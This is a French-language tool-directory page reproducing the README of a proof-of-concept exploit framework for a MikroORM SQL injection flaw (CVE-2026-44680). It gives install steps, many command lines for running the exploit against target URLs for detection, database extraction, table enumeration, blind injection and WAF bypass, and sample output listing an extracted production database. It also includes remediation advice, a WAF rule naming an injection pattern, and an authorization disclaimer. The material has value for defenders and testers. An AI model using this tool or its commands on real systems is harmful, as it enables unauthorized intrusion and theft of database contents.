Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — Outil PoC pour CVE-2026-44680 affectant MikroORM ≤7.0.13. Exploite l'injection de chemin JSON pour extraire le contenu de la base de données via des attaques basées sur UNION. Propose la détection de vulnérabilités, l'extraction automatisée de données, l'énumération des tables et la prise en charge de l'injection aveugle. Comprend l'intégration d'un proxy pour Burp Suite et des techniques de contournement de WAF. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
Frameworks de Tests d'IntrusionScanners de VulnérabilitésAnalyse de CodeExploitationSécurité WebSécurité des Bases de Données
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

Voir le dépôt
132il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Outil PoC pour CVE-2026-44680 affectant MikroORM ≤7.0.13. Exploite l'injection de chemin JSON pour extraire le contenu de la base de données via des attaques basées sur UNION. Propose la détection de vulnérabilités, l'extraction automatisée de données, l'énumération des tables et la prise en charge de l'injection aveugle. Comprend l'intégration d'un proxy pour Burp Suite et des techniques de contournement de WAF.

Partager

CVE-2026-44680 - Framework d'exploitation d'injection SQL pour MikroORM

Python Version License Status CVSS

Outil professionnel de preuve de concept pour chercheurs en sécurité


🔍 Aperçu

CVE-2026-44680 est une vulnérabilité critique d'injection SQL affectant MikroORM, un ORM TypeScript populaire pour Node.js. Ce framework d'exploitation fournit aux chercheurs en sécurité et aux testeurs d'intrusion un outil professionnel pour détecter et exploiter la vulnérabilité.

Auteur : Sudeepa Wanigarathna
Version : 1.0.0
Classification : Outil professionnel de recherche en sécurité


🚨 Détails de la vulnérabilité

AttributValeur
ID CVECVE-2026-44680
Score CVSS7.6 (Élevé)
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisFaible

Versions concernées

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

Cause racine

MikroORM n'échappe pas correctement les clés de chemins JSON contrôlées à l'exécution lors de la construction de requêtes JSON_EXTRACT. Les attaquants peuvent sortir du contexte du chemin JSON et injecter du code SQL arbitraire.


✨ Fonctionnalités

FonctionnalitéDescriptionStatut
Détection de vulnérabilitéDétection temporelle et par erreurs✅
Extraction de base de donnéesVersion, base de données, utilisateur, nom d'hôte✅
Énumération des tablesDécouverte automatique de toutes les tables✅
Injection basée sur UNIONExtraction de données via UNION SELECT✅
Injection aveugleExtraction de caractères par injection booléenne✅
Support du proxyBurp Suite / proxy d'interception✅
Génération de rapportsRapports TXT professionnels✅
Contournement WAFTechniques avancées d'obfuscation✅

📦 Installation

Prérequis

# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

Étapes d'installation

Étape 1 : Cloner le dépôt

git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

Étape 2 : Installer les dépendances

# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

Étape 3 : Vérifier l'installation

python exploit.py --help

requirements.txt

requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 Démarrage rapide

Utilisation de base

# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 Guide d'utilisation

Options de la commande

OptionDescriptionDéfaut
-u, --urlURL cible (obligatoire)-
-e, --endpointPoint de terminaison API/api/users/search
-p, --proxyProxy HTTPAucun
-v, --verboseSortie détailléeFaux
--detectDétecter la vulnérabilité uniquementFaux
--extractExtraire les informations de la base de donnéesFaux
--enumerateÉnumérer les tablesFaux
--blindMode d'injection aveugleFaux

Exemples de commandes

1. Exploitation complète

python exploit.py -u http://192.168.1.100:3000

2. Point de terminaison personnalisé

python exploit.py -u http://target.com -e /api/v2/users/query

3. Avec proxy (Burp Suite)

python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. Débogage détaillé

python exploit.py -u http://target.com -v --extract

5. Injection aveugle

python exploit.py -u http://target.com --blind

6. Détection uniquement

python exploit.py -u http://target.com --detect

7. Extraire les informations de la base de données

python exploit.py -u http://target.com --extract

8. Énumérer les tables

python exploit.py -u http://target.com --enumerate

📊 Exemples de sortie

Sortie console

============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

Fichiers générés

exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ Remédiation

Actions immédiates

1. Mettre à jour MikroORM

npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. Validation des entrées

const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. Règles WAF

# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. Durcissement de la base de données

  • Appliquer le principe du moindre privilège
  • Utiliser des utilisateurs de base de données distincts
  • Mettre en place la journalisation des requêtes
  • Activer la détection d'injection SQL

⚠️ Avertissement

IMPORTANT : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives.

Avis légal

  • ✅ Vous DEVEZ avoir une autorisation explicite avant de tester tout système
  • ✅ Vous êtes responsable de tout dommage causé par une mauvaise utilisation
  • ✅ Utilisez-le de manière éthique et signalez les vulnérabilités de manière responsable

Directives d'utilisation éthique

  1. Autorisation : Obtenir une autorisation écrite du propriétaire du système
  2. Signalement : Signaler les découvertes aux fournisseurs concernés de manière responsable
  3. Confidentialité : Ne pas divulguer les vulnérabilités tant qu'elles ne sont pas corrigées
  4. Limitations : Rester dans le cadre des tests autorisés

📄 Licence

Ce projet est distribué sous la licence MIT.

MIT License

Copyright (c) 2026 Sudeepa Wanigarathna
Télécharger l’outil